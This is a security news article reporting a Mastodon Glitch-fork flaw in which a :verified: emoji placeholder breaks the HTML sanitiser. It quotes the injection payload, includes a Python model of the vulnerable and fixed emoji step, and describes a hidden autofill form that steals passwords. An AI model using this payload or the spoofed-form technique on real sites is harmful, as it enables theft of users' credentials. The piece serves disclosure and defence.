Mastodon users vulnerable to password-stealing attacks


Attackers could steal password credentials from Mastodon users due to a vulnerability in Glitch, a fork of Mastodon, a researcher has warned.

Mastodon has risen in popularity in recent weeks, as many users moved to the social media platform as a replacement for Twitter, recently acquired by controversial businessman Elon Musk.

“Everybody on infosec Twitter seemed to be jumping ship to the infosec.exchange Mastodon server, so I decided to see what the fuss was all about,” Gareth Heyes, of PortSwigger Research*, wrote in a blog post released today.

Heyes found he was able to steal users’ stored credentials using Chrome’s autofill feature by tricking them into clicking a malicious element he had disguised as a toolbar.

After discovering that Mastodon allows users to post HTML, Heyes found out from other users that he was able to spoof a blue ‘official’ tick in his username by inputting :verified:.

He placed the :verified: string inside an anchor text node that was inside the title attribute by doing the following:

Input: <abbr title="<a href='https://blah'>:verified:</a>><iframe src=//garethheyes.co.uk/>">

Output: <abbr title="<a href='https://blah'><img draggable="false" … >><iframe src=//garethheyes.co.uk/>

This allowed Heyes to bypass the HTML filter: the :verified: placeholder was replaced with an image tag containing double quotes, which terminated the title attribute and left the remainder of its contents to be parsed as live markup.
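An added Python model (not Glitch's or Mastodon's code) of the sanitise-then-emojify order described above: the sanitiser keeps <abbr title="..."> and escapes only what a quoted attribute requires, then a blind string replace expands :verified: into an <img> whose double quotes end the attribute, so a real tokenizer (the stdlib HTMLParser standing in for the browser) sees a live iframe, while the fixed variant expands shortcodes in text nodes only. The function names, the tag regex, the emoji image path and the attacker.example host are assumptions of the example, and the title value is a constructed copy of the article's input.

```python
import re
from html import escape
from html.parser import HTMLParser
# The emoji the :verified: shortcode expands to: note the double quotes.
VERIFIED_IMG = '<img draggable="false" alt=":verified:" src="/emoji/verified.png">'
# One complete tag; quoted attribute values may contain '<' and '>'.
TAG_RE = re.compile(r"""<(?:[^<>"']|"[^"]*"|'[^']*')*>""")

def sanitise(title: str, text: str) -> str:
    """Stage 1: the sanitiser keeps <abbr title=...> and re-serialises it.
    Only & and " need escaping in a double-quoted attribute, so markup typed
    into the title survives there verbatim, as inert attribute text."""
    safe_title = title.replace("&", "&amp;").replace('"', "&quot;")
    return f'<abbr title="{safe_title}">{escape(text)}</abbr>'

def emojify_vulnerable(html: str) -> str:
    """Stage 2 as the bug: a blind replace over the finished HTML string."""
    return html.replace(":verified:", VERIFIED_IMG)

def emojify_fixed(html: str) -> str:
    """Stage 2 fixed: expand shortcodes in text nodes only, never inside a tag."""
    out, pos = [], 0
    for m in TAG_RE.finditer(html):
        out.append(html[pos:m.start()].replace(":verified:", VERIFIED_IMG))
        out.append(m.group(0))  # tag and its attributes pass through untouched
        pos = m.end()
    out.append(html[pos:].replace(":verified:", VERIFIED_IMG))
    return "".join(out)

class TagCollector(HTMLParser):
    # Records the start tags a real tokenizer emits for the markup.
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
    handle_startendtag = handle_starttag

def live_tags(html: str) -> list:
    p = TagCollector()
    p.feed(html)
    p.close()
    return p.tags

# Constructed payload modelled on the article's input (placeholder host).
TITLE = "<a href='https://blah'>:verified:</a>><iframe src=//attacker.example/>"
if __name__ == "__main__":
    post = sanitise(TITLE, ":verified: hello")
    print(live_tags(emojify_vulnerable(post)))  # ['abbr', 'iframe', 'img']
    print(live_tags(emojify_fixed(post)))       # ['abbr', 'img']
```

The same check applies to any transformation run after a sanitiser (mentions, hashtags, link previews): if it is done by string replacement on serialised HTML rather than on text nodes, the sanitiser's guarantees no longer hold.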

“The filter was completely destroyed as I could just inject arbitrary HTML, but one last thing stood in my way: they used a relatively strict Content Security Policy (CSP),” wrote Heyes.

“Pretty much each resource was limited to infosec.exchange, with the exception of iframes which allowed any HTTPS URL.”

Spoofed

Heyes then realised he could inject form elements, allowing him to spoof a password form which, combined with Chrome autofill, would give an attacker access to the credentials.

Worse still, the researcher was able to spoof Mastodon's own toolbar: if a user clicked on any element of the spoofed toolbar, it would send their credentials to an attacker’s server.

Heyes tested Chrome to see if it would still autofill the credentials when the inputs were invisible. If an attacker used an opacity value of zero, Chrome would still conveniently fill in the credentials.

Due to the CSP, Heyes couldn’t use inline styles. However, looking at the CSS files, he found a class that had opacity:0 “in a couple of seconds”, which “worked perfectly”.

He explained to The Daily Swig: “Add the PoC code into post text area and hit publish – [the] user sees [the] post and clicks on what they think is a Mastodon toolbar. Credentials are [then] sent to an external server.

“In a real attack the credentials will be stored and the user redirected back to the site.”

Mitigations

Any Mastodon instance using the Glitch fork of Mastodon is vulnerable, Heyes explained, adding that since the server is vulnerable, “there’s not much a user can do to protect themselves”.

He added: “However, it would be a good idea to only autofill your password with user interaction to prevent credentials from being stolen.”

Heyes reported the bug directly to Glitch. Contributors have released a patch for the issue, which is available on the Glitch repo.


* PortSwigger Research is the research arm of PortSwigger Ltd, the parent company of The Daily Swig.

https://portswigger.net/daily-swig/mastodon-users-vulnerable-to-password-stealing-attacks
